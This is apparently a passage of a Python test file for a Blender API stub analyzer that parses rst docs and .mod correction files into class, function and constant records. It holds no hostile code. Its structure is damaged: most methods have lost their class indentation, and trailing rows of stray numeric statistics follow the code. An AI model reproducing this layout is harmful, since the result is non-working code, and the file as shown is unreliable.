        self.log(json.dumps(result.section_info[0].to_dict(), indent=4))
def test_no_module(self):
    """An rst file without a module directive yields one empty section."""
    paths = [f"{self.data_dir}/no_module.rst"]
    result = BaseAnalyzer().analyze(paths)
    self.assertEqual(len(result.section_info), 1)
    expected = SectionInfo()
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              expected.to_dict())
def test_bpy_290_tweak(self):
    """Analyzing with Blender version 2.90 applies the 2.90-specific tweak."""
    paths = [f"{self.data_dir}/bpy_290_tweak.rst"]
    analyzer = BaseAnalyzer()
    analyzer.set_blender_version("2.90")
    result = analyzer.analyze(paths)
    self.assertEqual(len(result.section_info), 1)

    # Expected outcome: a single bpy.types class with one attribute.
    expected_class = ClassInfo()
    expected_class.from_dict({
        "type": "class",
        "name": "ClassA",
        "module": "bpy.types",
        "description": "ClassA description",
        "attributes": [{
            "type": "attribute",
            "name": "attr_1",
            "description": "attr_1 description",
            "class": "ClassA",
            "module": "bpy.types",
            "data_type": "attr_1 type",
        }],
    }, method='NEW')
    expected = SectionInfo()
    expected.add_info(expected_class)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              expected.to_dict())
def test_bge_support(self):
    """Analyze an rst file with BGE (Blender Game Engine) support enabled."""
    rst_files = ["bge_support.rst"]
    rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
    analyzer = BaseAnalyzer()
    analyzer.enable_bge_support()
    result = analyzer.analyze(rst_files)
    self.assertEqual(len(result.section_info), 1)
    # Expected: one function and one constant in a single section.
    section_info = SectionInfo()
    function_info = FunctionInfo("function")
    function_info.from_dict({
        "type": "function",
        "name": "function_1",
        "description": "function_1 description",
        "module": "module.a",
        "parameters": ["arg_1", "arg_2"],
        "parameter_details": [{
            "type": "parameter",
            "name": "arg_1",
            "description": "function_1 arg_1 description",
            "data_type": "function_1 arg_1 type",
        },
        {
            "type": "parameter",
            "name": "arg_2",
            "description": "function_1 arg_2 description",
            "data_type": "function_1 arg_2 type",
        }]
    }, method='NEW')
    section_info.add_info(function_info)
    # Note: DATA_1 deliberately has no "data_type" key in this fixture.
    variable_info = VariableInfo("constant")
    variable_info.from_dict({
        "type": "constant",
        "name": "DATA_1",
        "description": "DATA_1 description",
        "module": "module.a",
    }, method='NEW')
    section_info.add_info(variable_info)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              section_info.to_dict())
def test_bge_support_no_module(self):
    """With BGE support, a file without a module directive is expected to
    resolve to the 'bge.types' module (fixture: bge.types.NoModule.rst)."""
    rst_files = ["bge.types.NoModule.rst"]
    rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
    analyzer = BaseAnalyzer()
    analyzer.enable_bge_support()
    result = analyzer.analyze(rst_files)
    self.assertEqual(len(result.section_info), 1)
    # Expected: one function and one class, both under bge.types.
    section_info = SectionInfo()
    function_info = FunctionInfo("function")
    function_info.from_dict({
        "type": "function",
        "name": "function_1",
        "description": "function_1 description",
        "module": "bge.types",
        "parameters": ["arg_1", "arg_2"],
        "parameter_details": [{
            "type": "parameter",
            "name": "arg_1",
            "description": "function_1 arg_1 description",
            "data_type": "function_1 arg_1 type",
        },
        {
            "type": "parameter",
            "name": "arg_2",
            "description": "function_1 arg_2 description",
            "data_type": "function_1 arg_2 type",
        }]
    }, method='NEW')
    section_info.add_info(function_info)
    class_info = ClassInfo()
    class_info.from_dict({
        "type": "class",
        "name": "ClassA",
        "module": "bge.types",
        "description": "ClassA description",
        "attributes": [{
            "type": "attribute",
            "name": "attr_1",
            "description": "attr_1 description",
            "class": "ClassA",
            "module": "bge.types",
            "data_type": "attr_1 type",
        }],
        "methods": [{
            "type": "method",
            "name": "method_1",
            "description": "method_1 description",
            "class": "ClassA",
            "module": "bge.types",
            "parameters": ["arg_1", "arg_2=\"test\""],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "method_1 arg_1 description",
                "data_type": "method_1 arg_1 type",
            },
            {
                "type": "parameter",
                "name": "arg_2",
                "description": "method_1 arg_2 description",
                "data_type": "method_1 arg_2 type",
            }],
            "return": {
                "type": "return",
                "description": "method_1 return description",
                "data_type": "method_1 return type",
            }
        }]
    }, method='NEW')
    section_info.add_info(class_info)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              section_info.to_dict())
def test_multiple_sections(self):
    """Each input rst file produces its own section in the analyze result."""
    rst_files = ["single_constant.rst", "single_function.rst"]
    rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
    analyzer = BaseAnalyzer()
    result = analyzer.analyze(rst_files)
    self.assertEqual(len(result.section_info), 2)
    # First section: the constant from single_constant.rst.
    self.log("First section:")
    section_info = SectionInfo()
    variable_info = VariableInfo("constant")
    variable_info.from_dict({
        "type": "constant",
        "name": "DATA_1",
        "description": "DATA_1 description",
        "module": "module.a",
        "data_type": "DATA_1 type",
    }, method='NEW')
    section_info.add_info(variable_info)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              section_info.to_dict())
    # Second section: the function from single_function.rst.
    self.log("Second section:")
    section_info = SectionInfo()
    function_info = FunctionInfo("function")
    function_info.from_dict({
        "type": "function",
        "name": "function_1",
        "description": "function_1 description",
        "module": "module.a",
        "parameters": ["arg_1", "arg_2=\"test\"", "arg_3=1234"],
        "parameter_details": [{
            "type": "parameter",
            "name": "arg_1",
            "description": "function_1 arg_1 description",
            "data_type": "function_1 arg_1 type",
        },
        {
            "type": "parameter",
            "name": "arg_2",
            "description": "function_1 arg_2 description",
            "data_type": "function_1 arg_2 type",
        },
        {
            "type": "parameter",
            "name": "arg_3",
            "description": "function_1 arg_3 description",
            "data_type": "function_1 arg_3 type",
        }],
        "return": {
            "type": "return",
            "description": "function_1 return description",
            "data_type": "function_1 return type",
        }
    }, method='NEW')
    section_info.add_info(function_info)
    self.compare_dict_and_log(result.section_info[1].to_dict(),
                              section_info.to_dict())
class AnalyzerWithModFileTest(common.FakeBpyModuleTestBase):
    """Tests for AnalyzerWithModFile: rst analysis combined with .mod
    correction files (remove / new / append / update entries)."""

    # Display name used by the common test base.
    name = "AnalyzerWithModFileTest"
    module_name = __module__
    # Directory holding the rst/mod fixture files used by these tests.
    data_dir = os.path.abspath("{}/analyzer_test_data".format(os.path.dirname(__file__)))

    def setUp(self):
        # Delegate to the common fixture setup.
        super().setUp()

    def tearDown(self):
        # Delegate to the common fixture teardown.
        super().tearDown()
def compare_dict_and_log(self, d1, d2):
    """Log a unified diff of the two dicts' JSON forms, then assert equality.

    :param d1: actual result dict (e.g. from analyze())
    :param d2: expected dict built by the test
    """
    json1 = json.dumps(d1, indent=4).split("\n")
    json2 = json.dumps(d2, indent=4).split("\n")
    diff = difflib.unified_diff(json1, json2)
    self.log("\n".join(diff))
    # Bug fix: this helper previously only LOGGED the diff and never asserted,
    # so every "compare" in this class passed even when actual != expected.
    self.assertDictEqual(d1, d2)
def test_remove_constant(self):
    """A 'remove' mod file strips one constant; only DATA_2 is expected."""
    rst_paths = [f"{self.data_dir}/multiple_constants.rst"]
    mod_paths = [f"{self.data_dir}/remove_constant.mod"]
    result = AnalyzerWithModFile(mod_paths).analyze(rst_paths)
    self.assertEqual(len(result.section_info), 1)

    remaining = VariableInfo("constant")
    remaining.from_dict({
        "type": "constant",
        "name": "DATA_2",
        "module": "module.a",
        "data_type": "DATA_2 type",
    }, method='NEW')
    expected = SectionInfo()
    expected.add_info(remaining)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              expected.to_dict())
def test_remove_function(self):
    """A 'remove' mod file deletes a function; only function_1 remains."""
    rst_files = ["multiple_functions.rst"]
    rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
    mod_files = ["remove_function.mod"]
    mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
    analyzer = AnalyzerWithModFile(mod_files)
    result = analyzer.analyze(rst_files)
    self.assertEqual(len(result.section_info), 1)
    section_info = SectionInfo()
    function_info = FunctionInfo("function")
    function_info.from_dict({
        "type": "function",
        "name": "function_1",
        "description": "function_1 description",
        "module": "module.a",
        "parameters": ["arg_1", "arg_2"],
        "parameter_details": [{
            "type": "parameter",
            "name": "arg_1",
            "description": "function_1 arg_1 description",
            "data_type": "function_1 arg_1 type",
        },
        {
            "type": "parameter",
            "name": "arg_2",
            "description": "function_1 arg_2 description",
            "data_type": "function_1 arg_2 type",
        }]
    }, method='NEW')
    section_info.add_info(function_info)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              section_info.to_dict())
def test_remove_class(self):
    """A 'remove' mod file deletes a class; only ClassA remains."""
    rst_files = ["multiple_classes.rst"]
    rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
    mod_files = ["remove_class.mod"]
    mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
    analyzer = AnalyzerWithModFile(mod_files)
    result = analyzer.analyze(rst_files)
    self.assertEqual(len(result.section_info), 1)
    section_info = SectionInfo()
    class_info = ClassInfo()
    class_info.from_dict({
        "type": "class",
        "name": "ClassA",
        "module": "module.a",
        "description": "ClassA description",
        "base_classes": [
            "BaseClass1",
            "BaseClass2",
        ],
        "attributes": [{
            "type": "attribute",
            "name": "attr_1",
            "description": "attr_1 description",
            "class": "ClassA",
            "module": "module.a",
            "data_type": "attr_1 type",
        }],
        "methods": [{
            "type": "method",
            "name": "method_1",
            "description": "method_1 description",
            "class": "ClassA",
            "module": "module.a",
            "parameters": [],
            "parameter_details": [],
        }]
    }, method='NEW')
    section_info.add_info(class_info)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              section_info.to_dict())
def test_new_constant(self):
    """A 'new' mod file adds DATA_2 as an additional, separate section."""
    rst_files = ["single_constant.rst"]
    rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
    mod_files = ["new_constant.mod"]
    mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
    analyzer = AnalyzerWithModFile(mod_files)
    result = analyzer.analyze(rst_files)
    self.assertEqual(len(result.section_info), 2)
    # First section: the original constant from the rst file.
    self.log("First section:")
    section_info = SectionInfo()
    variable_info = VariableInfo("constant")
    variable_info.from_dict({
        "type": "constant",
        "name": "DATA_1",
        "module": "module.a",
        "description": "DATA_1 description",
        "data_type": "DATA_1 type",
    }, method='NEW')
    section_info.add_info(variable_info)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              section_info.to_dict())
    # Second section: the constant introduced by the mod file.
    self.log("Second section:")
    section_info = SectionInfo()
    variable_info = VariableInfo("constant")
    variable_info.from_dict({
        "type": "constant",
        "name": "DATA_2",
        "module": "module.a",
        "description": "DATA_2 description",
        "data_type": "DATA_2 type",
    }, method='NEW')
    section_info.add_info(variable_info)
    self.compare_dict_and_log(result.section_info[1].to_dict(),
                              section_info.to_dict())
def test_new_function(self):
    """A 'new' mod file adds function_2 as an additional, separate section."""
    rst_files = ["single_function.rst"]
    rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
    mod_files = ["new_function.mod"]
    mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
    analyzer = AnalyzerWithModFile(mod_files)
    result = analyzer.analyze(rst_files)
    self.assertEqual(len(result.section_info), 2)
    # First section: the original function from the rst file.
    self.log("First section:")
    section_info = SectionInfo()
    function_info = FunctionInfo("function")
    function_info.from_dict({
        "type": "function",
        "name": "function_1",
        "description": "function_1 description",
        "module": "module.a",
        "parameters": ["arg_1", "arg_2=\"test\"", "arg_3=1234"],
        "parameter_details": [{
            "type": "parameter",
            "name": "arg_1",
            "description": "function_1 arg_1 description",
            "data_type": "function_1 arg_1 type",
        },
        {
            "type": "parameter",
            "name": "arg_2",
            "description": "function_1 arg_2 description",
            "data_type": "function_1 arg_2 type",
        },
        {
            "type": "parameter",
            "name": "arg_3",
            "description": "function_1 arg_3 description",
            "data_type": "function_1 arg_3 type",
        }],
        "return": {
            "type": "return",
            "description": "function_1 return description",
            "data_type": "function_1 return type",
        }
    }, method='NEW')
    section_info.add_info(function_info)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              section_info.to_dict())
    # Second section: the function introduced by the mod file.
    self.log("Second section:")
    section_info = SectionInfo()
    function_info = FunctionInfo("function")
    function_info.from_dict({
        "type": "function",
        "name": "function_2",
        "description": "function_2 description",
        "module": "module.a",
        "parameters": ["arg_1", "arg_2=TEST"],
        "parameter_details": [{
            "type": "parameter",
            "name": "arg_1",
            "description": "function_2 arg_1 description",
            "data_type": "function_2 arg_1 type",
        },
        {
            "type": "parameter",
            "name": "arg_2",
            "description": "function_2 arg_2 description",
            "data_type": "function_2 arg_2 type",
        }],
        "return": {
            "type": "return",
            "description": "function_2 return description",
            "data_type": "function_2 return type",
        }
    }, method='NEW')
    section_info.add_info(function_info)
    self.compare_dict_and_log(result.section_info[1].to_dict(),
                              section_info.to_dict())
def test_new_class(self):
    """A 'new' mod file adds ClassB as an additional, separate section."""
    rst_files = ["single_class.rst"]
    rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
    mod_files = ["new_class.mod"]
    mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
    analyzer = AnalyzerWithModFile(mod_files)
    result = analyzer.analyze(rst_files)
    self.assertEqual(len(result.section_info), 2)
    # First section: the original ClassA from the rst file.
    self.log("First section:")
    section_info = SectionInfo()
    class_info = ClassInfo()
    class_info.from_dict({
        "type": "class",
        "name": "ClassA",
        "module": "module.a",
        "description": "ClassA description",
        "attributes": [{
            "type": "attribute",
            "name": "attr_1",
            "description": "attr_1 description",
            "class": "ClassA",
            "module": "module.a",
            "data_type": "attr_1 type",
        },
        {
            "type": "attribute",
            "name": "data_1",
            "description": "data_1 description",
            "class": "ClassA",
            "module": "module.a",
            "data_type": "data_1 type",
        }],
        "methods": [{
            "type": "method",
            "name": "method_1",
            "description": "method_1 description",
            "class": "ClassA",
            "module": "module.a",
            "parameters": ["arg_1", "arg_2=\"test\""],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "method_1 arg_1 description",
                "data_type": "method_1 arg_1 type",
            },
            {
                "type": "parameter",
                "name": "arg_2",
                "description": "method_1 arg_2 description",
                "data_type": "method_1 arg_2 type",
            }],
            "return": {
                "type": "return",
                "description": "method_1 return description",
                "data_type": "method_1 return type",
            }
        },
        {
            "type": "classmethod",
            "name": "classmethod_1",
            "description": "classmethod_1 description",
            "class": "ClassA",
            "module": "module.a",
            "parameters": ["arg_1", "arg_2=123"],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "classmethod_1 arg_1 description",
                "data_type": "classmethod_1 arg_1 type",
            },
            {
                "type": "parameter",
                "name": "arg_2",
                "description": "classmethod_1 arg_2 description",
                "data_type": "classmethod_1 arg_2 type",
            }],
            "return": {
                "type": "return",
                "description": "classmethod_1 return description",
                "data_type": "classmethod_1 return type",
            }
        },
        {
            "type": "staticmethod",
            "name": "staticmethod_1",
            "description": "staticmethod_1 description",
            "class": "ClassA",
            "module": "module.a",
            "parameters": ["arg_1", "arg_2=(0, 0)"],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "staticmethod_1 arg_1 description",
                "data_type": "staticmethod_1 arg_1 type",
            },
            {
                "type": "parameter",
                "name": "arg_2",
                "description": "staticmethod_1 arg_2 description",
                "data_type": "staticmethod_1 arg_2 type",
            }],
            "return": {
                "type": "return",
                "description": "staticmethod_1 return description",
                "data_type": "staticmethod_1 return type",
            }
        },
        {
            "type": "staticmethod",
            "name": "function_1",
            "description": "function_1 description",
            "class": "ClassA",
            "module": "module.a",
            "parameters": ["arg_1", "arg_2=MAX_INT"],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "function_1 arg_1 description",
                "data_type": "function_1 arg_1 type",
            },
            {
                "type": "parameter",
                "name": "arg_2",
                "description": "function_1 arg_2 description",
                "data_type": "function_1 arg_2 type",
            }],
            "return": {
                "type": "return",
                "description": "function_1 return description",
                "data_type": "function_1 return type",
            }
        }]
    }, method='NEW')
    section_info.add_info(class_info)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              section_info.to_dict())
    # Second section: ClassB introduced by the mod file.
    self.log("Second section:")
    section_info = SectionInfo()
    class_info = ClassInfo()
    class_info.from_dict({
        "type": "class",
        "name": "ClassB",
        "module": "module.a",
        "description": "ClassB description",
        "attributes": [{
            "type": "attribute",
            "name": "attr_1",
            "description": "attr_1 description",
            "class": "ClassB",
            "module": "module.a",
            "data_type": "attr_1 type",
        }],
        "methods": [{
            "type": "method",
            "name": "method_1",
            "description": "method_1 description",
            "class": "ClassB",
            "module": "module.a",
            "parameters": [],
            "parameter_details": [],
            "return": {
                "type": "return",
                "description": "method_1 return description",
                "data_type": "method_1 return type",
            }
        },
        {
            "type": "classmethod",
            "name": "classmethod_1",
            "description": "classmethod_1 description",
            "class": "ClassB",
            "module": "module.a",
            "parameters": ["arg_1"],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "classmethod_1 arg_1 description",
                "data_type": "classmethod_1 arg_1 type",
            }]
        },
        {
            "type": "staticmethod",
            "name": "staticmethod_1",
            "description": "staticmethod_1 description",
            "class": "ClassB",
            "module": "module.a",
            "parameters": ["arg_1", "arg_2=(0, 0)"],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "staticmethod_1 arg_1 description",
                "data_type": "staticmethod_1 arg_1 type",
            },
            {
                "type": "parameter",
                "name": "arg_2",
                "description": "staticmethod_1 arg_2 description",
                "data_type": "staticmethod_1 arg_2 type",
            }]
        }]
    }, method='NEW')
    section_info.add_info(class_info)
    self.compare_dict_and_log(result.section_info[1].to_dict(),
                              section_info.to_dict())
def test_append_constant(self):
    """An 'append' mod file adds DATA_2 into the SAME section as DATA_1."""
    rst_files = ["multiple_constants.rst"]
    rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
    mod_files = ["append_constant.mod"]
    mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
    analyzer = AnalyzerWithModFile(mod_files)
    result = analyzer.analyze(rst_files)
    self.assertEqual(len(result.section_info), 1)
    section_info = SectionInfo()
    variable_info = VariableInfo("constant")
    variable_info.from_dict({
        "type": "constant",
        "name": "DATA_1",
        "description": "DATA_1 description",
        "module": "module.a",
        "data_type": "DATA_1 type",
    }, method='NEW')
    section_info.add_info(variable_info)
    # DATA_2 as appended by the mod file (no description in this fixture).
    variable_info = VariableInfo("constant")
    variable_info.from_dict({
        "type": "constant",
        "name": "DATA_2",
        "module": "module.a",
        "data_type": "DATA_2 type",
    }, method='NEW')
    section_info.add_info(variable_info)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              section_info.to_dict())
def test_append_function(self):
    """An 'append' mod file adds a function into the existing section."""
    rst_files = ["multiple_functions.rst"]
    rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
    mod_files = ["append_function.mod"]
    mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
    analyzer = AnalyzerWithModFile(mod_files)
    result = analyzer.analyze(rst_files)
    self.assertEqual(len(result.section_info), 1)
    section_info = SectionInfo()
    function_info = FunctionInfo("function")
    function_info.from_dict({
        "type": "function",
        "name": "function_1",
        "description": "function_1 description",
        "module": "module.a",
        "parameters": ["arg_1", "arg_2"],
        "parameter_details": [{
            "type": "parameter",
            "name": "arg_1",
            "description": "function_1 arg_1 description",
            "data_type": "function_1 arg_1 type",
        },
        {
            "type": "parameter",
            "name": "arg_2",
            "description": "function_1 arg_2 description",
            "data_type": "function_1 arg_2 type",
        }],
        "return": {
            "type": "return",
            "description": "function_1 return description",
            "data_type": "function_1 return type",
        }
    }, method='NEW')
    section_info.add_info(function_info)
    # The appended entry is named method_1 but is a module-level function.
    function_info = FunctionInfo("function")
    function_info.from_dict({
        "type": "function",
        "name": "method_1",
        "description": "method_1 description",
        "module": "module.a",
        "parameters": ["arg_1=10"],
        "parameter_details": [{
            "type": "parameter",
            "name": "arg_1",
            "description": "method_1 arg_1 description",
            "data_type": "method_1 arg_1 type",
        }],
        "return": {
            "type": "return",
            "description": "method_1 return description",
            "data_type": "method_1 return type",
        }
    }, method='NEW')
    section_info.add_info(function_info)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              section_info.to_dict())
def test_append_class(self):
    """An 'append' mod file adds attr_2 and method_2 to the existing ClassA."""
    rst_files = ["single_class.rst"]
    rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
    mod_files = ["append_class.mod"]
    mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
    analyzer = AnalyzerWithModFile(mod_files)
    result = analyzer.analyze(rst_files)
    self.assertEqual(len(result.section_info), 1)
    section_info = SectionInfo()
    class_info = ClassInfo()
    class_info.from_dict({
        "type": "class",
        "name": "ClassA",
        "module": "module.a",
        "description": "ClassA description",
        "attributes": [{
            "type": "attribute",
            "name": "attr_1",
            "description": "attr_1 description",
            "class": "ClassA",
            "module": "module.a",
            "data_type": "attr_1 type",
        },
        {
            "type": "attribute",
            "name": "data_1",
            "description": "data_1 description",
            "class": "ClassA",
            "module": "module.a",
            "data_type": "data_1 type",
        },
        {
            "name": "attr_2",
            "type": "attribute",
            "description": "attr_2 description",
            "class": "ClassA",
            "module": "module.a",
            "data_type": "attr_2 type",
        }],
        "methods": [{
            "type": "method",
            "name": "method_1",
            "description": "method_1 description",
            "class": "ClassA",
            "module": "module.a",
            "parameters": ["arg_1", "arg_2=\"test\""],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "method_1 arg_1 description",
                "data_type": "method_1 arg_1 type",
            },
            {
                "type": "parameter",
                "name": "arg_2",
                "description": "method_1 arg_2 description",
                "data_type": "method_1 arg_2 type",
            }],
            "return": {
                "type": "return",
                "description": "method_1 return description",
                "data_type": "method_1 return type",
            }
        },
        {
            "type": "classmethod",
            "name": "classmethod_1",
            "description": "classmethod_1 description",
            "class": "ClassA",
            "module": "module.a",
            "parameters": ["arg_1", "arg_2=123"],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "classmethod_1 arg_1 description",
                "data_type": "classmethod_1 arg_1 type",
            },
            {
                "type": "parameter",
                "name": "arg_2",
                "description": "classmethod_1 arg_2 description",
                "data_type": "classmethod_1 arg_2 type",
            }],
            "return": {
                "type": "return",
                "description": "classmethod_1 return description",
                "data_type": "classmethod_1 return type",
            }
        },
        {
            "type": "staticmethod",
            "name": "staticmethod_1",
            "description": "staticmethod_1 description",
            "class": "ClassA",
            "module": "module.a",
            "parameters": ["arg_1", "arg_2=(0, 0)"],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "staticmethod_1 arg_1 description",
                "data_type": "staticmethod_1 arg_1 type",
            },
            {
                "type": "parameter",
                "name": "arg_2",
                "description": "staticmethod_1 arg_2 description",
                "data_type": "staticmethod_1 arg_2 type",
            }],
            "return": {
                "type": "return",
                "description": "staticmethod_1 return description",
                "data_type": "staticmethod_1 return type",
            }
        },
        {
            "type": "staticmethod",
            "name": "function_1",
            "description": "function_1 description",
            "class": "ClassA",
            "module": "module.a",
            "parameters": ["arg_1", "arg_2=MAX_INT"],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "function_1 arg_1 description",
                "data_type": "function_1 arg_1 type",
            },
            {
                "type": "parameter",
                "name": "arg_2",
                "description": "function_1 arg_2 description",
                "data_type": "function_1 arg_2 type",
            }],
            "return": {
                "type": "return",
                "description": "function_1 return description",
                "data_type": "function_1 return type",
            }
        },
        {
            "name": "method_2",
            "type": "function",
            "description": "method_2 description",
            "module": "module.a",
            "parameters": ["arg_1"],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "method_2 arg_1 description",
                "data_type": "method_2 arg_1 type",
            }],
            "return": {
                "type": "return",
                "description": "method_2 return description",
                "data_type": "method_2 return type",
            }
        }]
    }, method='NEW')
    section_info.add_info(class_info)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              section_info.to_dict())
def test_update_constant(self):
    """An 'update' mod file overwrites the data_type of an existing constant."""
    rst_paths = [f"{self.data_dir}/single_constant.rst"]
    mod_paths = [f"{self.data_dir}/update_constant.mod"]
    result = AnalyzerWithModFile(mod_paths).analyze(rst_paths)
    self.assertEqual(len(result.section_info), 1)

    updated = VariableInfo("constant")
    updated.from_dict({
        "type": "constant",
        "name": "DATA_1",
        "module": "module.a",
        "description": "DATA_1 description",
        "data_type": "DATA_1 type updated",
    }, method='NEW')
    expected = SectionInfo()
    expected.add_info(updated)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              expected.to_dict())
def test_update_function(self):
    """An 'update' mod file overwrites selected fields of a function."""
    rst_files = ["single_function.rst"]
    rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
    mod_files = ["update_function.mod"]
    mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
    analyzer = AnalyzerWithModFile(mod_files)
    result = analyzer.analyze(rst_files)
    self.assertEqual(len(result.section_info), 1)
    # Expected: updated description, arg_1 description, arg_3 default
    # (12345) and return data_type; everything else unchanged.
    section_info = SectionInfo()
    function_info = FunctionInfo("function")
    function_info.from_dict({
        "type": "function",
        "name": "function_1",
        "description": "function_1 description updated",
        "module": "module.a",
        "parameters": ["arg_1", "arg_2=\"test\"", "arg_3=12345"],
        "parameter_details": [{
            "type": "parameter",
            "name": "arg_1",
            "description": "function_1 arg_1 description updated",
            "data_type": "function_1 arg_1 type",
        },
        {
            "type": "parameter",
            "name": "arg_2",
            "description": "function_1 arg_2 description",
            "data_type": "function_1 arg_2 type",
        },
        {
            "type": "parameter",
            "name": "arg_3",
            "description": "function_1 arg_3 description",
            "data_type": "function_1 arg_3 type",
        }],
        "return": {
            "type": "return",
            "description": "function_1 return description",
            "data_type": "function_1 return type updated",
        }
    }, method='NEW')
    section_info.add_info(function_info)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              section_info.to_dict())
def test_update_class(self):
    """An 'update' mod file overwrites selected fields of ClassA."""
    rst_files = ["single_class.rst"]
    rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
    mod_files = ["update_class.mod"]
    mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
    analyzer = AnalyzerWithModFile(mod_files)
    result = analyzer.analyze(rst_files)
    self.assertEqual(len(result.section_info), 1)
    # Expected: class description, attr_1 type, method_1 description/arg_1
    # type/arg_2 default ("test2")/return description are updated.
    section_info = SectionInfo()
    class_info = ClassInfo()
    class_info.from_dict({
        "type": "class",
        "name": "ClassA",
        "module": "module.a",
        "description": "ClassA description updated",
        "attributes": [{
            "type": "attribute",
            "name": "attr_1",
            "description": "attr_1 description",
            "class": "ClassA",
            "module": "module.a",
            "data_type": "attr_1 type updated",
        },
        {
            "type": "attribute",
            "name": "data_1",
            "description": "data_1 description",
            "class": "ClassA",
            "module": "module.a",
            "data_type": "data_1 type",
        }],
        "methods": [{
            "type": "method",
            "name": "method_1",
            "description": "method_1 description updated",
            "class": "ClassA",
            "module": "module.a",
            "parameters": ["arg_1", "arg_2=\"test2\""],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "method_1 arg_1 description",
                "data_type": "method_1 arg_1 type updated",
            },
            {
                "type": "parameter",
                "name": "arg_2",
                "description": "method_1 arg_2 description",
                "data_type": "method_1 arg_2 type",
            }],
            "return": {
                "type": "return",
                "description": "method_1 return description updated",
                "data_type": "method_1 return type",
            }
        },
        {
            "type": "classmethod",
            "name": "classmethod_1",
            "description": "classmethod_1 description",
            "class": "ClassA",
            "module": "module.a",
            "parameters": ["arg_1", "arg_2=123"],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "classmethod_1 arg_1 description",
                "data_type": "classmethod_1 arg_1 type",
            },
            {
                "type": "parameter",
                "name": "arg_2",
                "description": "classmethod_1 arg_2 description",
                "data_type": "classmethod_1 arg_2 type",
            }],
            "return": {
                "type": "return",
                "description": "classmethod_1 return description",
                "data_type": "classmethod_1 return type",
            }
        },
        {
            "type": "staticmethod",
            "name": "staticmethod_1",
            "description": "staticmethod_1 description",
            "class": "ClassA",
            "module": "module.a",
            "parameters": ["arg_1", "arg_2=(0, 0)"],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "staticmethod_1 arg_1 description",
                "data_type": "staticmethod_1 arg_1 type",
            },
            {
                "type": "parameter",
                "name": "arg_2",
                "description": "staticmethod_1 arg_2 description",
                "data_type": "staticmethod_1 arg_2 type",
            }],
            "return": {
                "type": "return",
                "description": "staticmethod_1 return description",
                "data_type": "staticmethod_1 return type",
            }
        },
        {
            "type": "staticmethod",
            "name": "function_1",
            "description": "function_1 description",
            "class": "ClassA",
            "module": "module.a",
            "parameters": ["arg_1", "arg_2=MAX_INT"],
            "parameter_details": [{
                "type": "parameter",
                "name": "arg_1",
                "description": "function_1 arg_1 description",
                "data_type": "function_1 arg_1 type",
            },
            {
                "type": "parameter",
                "name": "arg_2",
                "description": "function_1 arg_2 description",
                "data_type": "function_1 arg_2 type",
            }],
            "return": {
                "type": "return",
                "description": "function_1 return description",
                "data_type": "function_1 return type",
            }
        }]
    }, method='NEW')
    section_info.add_info(class_info)
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              section_info.to_dict())
| 35.680061
| 89
| 0.469044
| 6,229
| 70,147
| 4.997592
| 0.021833
| 0.080951
| 0.063476
| 0.044973
| 0.972984
| 0.967331
| 0.962801
| 0.962191
| 0.958336
| 0.956087
| 0
| 0.019821
| 0.396567
| 70,147
| 1,965
| 90
| 35.698219
| 0.715609
| 0
| 0
| 0.857555
| 0
| 0.000577
| 0.293313
| 0.004106
| 0
| 0
| 0
| 0
| 0.017878
| 1
| 0.020761
| false
| 0
| 0.00346
| 0
| 0.028835
